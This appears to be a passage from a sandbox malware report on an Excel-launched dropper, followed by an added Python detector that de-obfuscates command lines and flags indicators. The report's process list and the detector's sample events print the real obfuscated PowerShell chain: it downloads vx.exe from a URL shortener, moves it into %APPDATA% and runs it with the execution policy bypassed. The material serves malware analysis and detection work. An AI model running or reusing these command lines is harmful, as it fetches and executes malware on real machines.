Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 10:04:19
Start date: 19/11/2020
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 10:04:19
Start date: 19/11/2020
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Imagebase: 0x12a0000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 10:04:20
Start date: 19/11/2020
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Imagebase: 0x12a0000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high
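
The three cmd.exe command lines above are one staged chain: fetch vx.exe through a URL shortener with a hidden window, sleep and move it into %APPDATA%, then sleep again and execute it with the execution policy bypassed. Each stage hides its keywords from plain string matching with cmd.exe caret escapes (`power^shell`), PowerShell backtick escapes (`nEw-oB`jecT`, `stARt`-slE`Ep`), string concatenation (`'Down'+'loadFile'`) and quoted member access (`.'Invoke'`). The detector below is an added example of my own, not part of the Joe Sandbox report: it undoes those four tricks and then matches the normalized command line against the behaviours the report flags, with the parent/child pairing from the Sigma rule "Microsoft Office Product Spawning Windows Shell". The sample events are constructed from the process list above (EXCEL.EXE is the parent of each cmd.exe), the benign control line is invented, and the indicator names are my own.

```python
import ntpath
import re
from typing import Dict, List

# Constructed sample events: the three cmd.exe command lines from the report's process
# list, each with EXCEL.EXE as parent, plus one invented benign event as a negative case.
OFFICE_PARENT = r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE"
SAMPLE_EVENTS = [
    {"parent": OFFICE_PARENT, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": "cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')"},
    {"parent": OFFICE_PARENT, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": "cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'"},
    {"parent": OFFICE_PARENT, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": "cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c dir C:\\Users"},  # benign control, constructed
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Characters a backtick legitimately escapes in PowerShell (`n, `t, ...). Any other
# backtick only splits a token. Simplification: the real parser is case-insensitive,
# but the sample relies on upper-case letters, so lower-case-only is what we want here.
PS_ESCAPES = "0abefnrtuv"


def normalize(cmdline: str) -> str:
    """Undo the four cheap obfuscations used in this sample so signatures can match."""
    s = re.sub(r"\^(.)", r"\1", cmdline)                        # cmd.exe: ^x -> x
    s = re.sub(r"`(?![" + PS_ESCAPES + r"])(.)", r"\1", s)     # PowerShell: `x -> x
    concat = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")          # 'a'+'b' -> 'ab'
    while True:
        s, n = concat.subn(r"'\1\2'", s)
        if n == 0:
            break
    s = re.sub(r"\.\(?'([A-Za-z_]\w*)'\)?", r".\1", s)         # .('M') / .'M' -> .M
    return s


INDICATORS = {
    "ps_hidden_window":           re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I),
    "ps_execution_policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I),
    "ps_webclient_download":      re.compile(r"net\.webclient\b.*downloadfile", re.I),
    "ps_sleep_before_action":     re.compile(r"start-sleep\s+\d+", re.I),
    "stage_in_appdata":           re.compile(r"\$\{?env:appdata\}?", re.I),
    "url_shortener":              re.compile(r"https?://cutt\.ly/", re.I),
}


def analyze(event: Dict[str, str]) -> Dict[str, object]:
    """Return the de-obfuscated command line and the sorted list of indicator names it hits."""
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    raw = event["cmdline"]
    norm = normalize(raw)
    hits: List[str] = []
    if parent in OFFICE_APPS and image in SHELLS:
        hits.append("office_spawns_shell")
    if raw != norm:                       # escapes were present purely to split tokens
        hits.append("command_line_obfuscation")
    hits.extend(name for name, rx in INDICATORS.items() if rx.search(norm))
    return {"normalized": norm, "indicators": sorted(hits)}


def analyze_all(events) -> List[Dict[str, object]]:
    return [analyze(e) for e in events]


if __name__ == "__main__":
    for result in analyze_all(SAMPLE_EVENTS):
        print(result["normalized"])
        print("   ->", ", ".join(result["indicators"]) or "clean")
```

Note which escapes survive where: the carets are consumed by cmd.exe, so the powershell.exe entries in the report already read `powershell`, while the backticks and the `'Down'+'loadFile'` concatenation survive into the PowerShell command line because only PowerShell's own parser resolves them. A rule that inspects powershell.exe command lines therefore still needs the backtick and concatenation steps, and a rule on cmd.exe needs all four.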

                                                                                                                                            Disassembly

                                                                                                                                            Code Analysis
